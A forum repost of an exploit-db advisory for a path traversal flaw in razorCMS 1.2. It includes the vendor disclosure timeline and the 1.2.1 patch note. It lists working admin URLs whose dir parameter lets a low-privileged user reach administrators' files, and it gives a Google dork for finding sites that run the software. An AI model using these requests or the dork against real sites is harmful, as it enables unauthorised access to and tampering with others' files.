The_Arhitect Posted January 10, 2012 Report Posted January 10, 2012 # Exploit Title: razorCMS 1.2 Path Traversal# Google Dork: "Powered by razorCMS"# Date: January 10, 2012# Author: chap0# Software Link: http://www.razorcms.co.uk/archive/core/# Version: 1.2# Tested on: Ubuntu# Patch: Upgrade to latest release 1.2.1# Greetz To: <Insert Name Here>RazorCMS is vulnerable to Path Traversal, when logged in witha least privileged user account the user can access theadministrator's and super administrator's directories andfiles by changing the path in the url. The vulnerabilities existin admin_func.phpPatch Time line:Dec 11, 2011 - Contacted VendorDec 11, 2011 - Vendor Replied ask for details of vulnerabilityDec 12, 2011 - Submitted detailsDec 13, 2011 - No reply asked for an updateDec 13, 2011 - Vendor Replied asking for a week or two for a fix after the holiday periodDec 20, 2011 - Emailed Vendor for an updateDec 21, 2011 - Vendor confirmed vulnerabilities asked for two weeks time for a fixDec 27, 2011 - Emailed vendor some "temp fixes" for the vulnerabilities discoveredJan 3, 2012 - Emailed vendor more "temp fixes"Jan 5, 2012 - Vendor replied sent a new updated file v1 admin_func.phpJan 5, 2012 - Replied to vendor discovered more vulnerabilitiesJan 6, 2012 - Vendor response with new file with fixes v2 admin_func.phpJan 6, 2012 - Tested discovered more vulnerabilitiesJan 8, 2012 - Vendor replied with new file v3 admin_func.phpJan 8, 2012 - Tested, vulnerabilities are fixed reported to vendorJan 9, 2012 - Vendor released update 1.2.1Jan 10, 2012 - Public DisclosurePath Traversal Details:The following files and directories are vulnerable to Path TraversalAttack including any files or directories that the admin or super adminmay create within these directorieshttp://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/http://razorcms-server/admin/?action=filemanview&dir=backup/http://razorcms-server/admin/?action=filemanview&dir=/razor_data.txthttp://razorcms-server/admin/?action=filemanview&dir=/index.htmhttp://razorcms-server/admin/?action=fileman&dir=razor_temp_logs/http://razorcms-server/admin/?action=fileman&dir=backup/http://razorcms-server/admin/?action=fileman&dir=/razor_data.txthttp://razorcms-server/admin/?action=fileman&dir=/index.htmAn example would be if the super admin created a directory within razor_temp_logsnamed sekrit which should not be accessible with a least privileged user, theleast privileged user can change the path as shown below:http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/Which also works on files within those directories which the user should not haveaccess to which at this point gives the user access to view, edit, rename, move,copy and delete the file.e.g.http://razorcms-server/admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txtAnother vulnerability exist in this version of razorCMS, if a least privileged user createsa directory with their logged in credentials, and then deletes the directory, the user willthen have access to the administrative directories and files.source: exploit-db.com Quote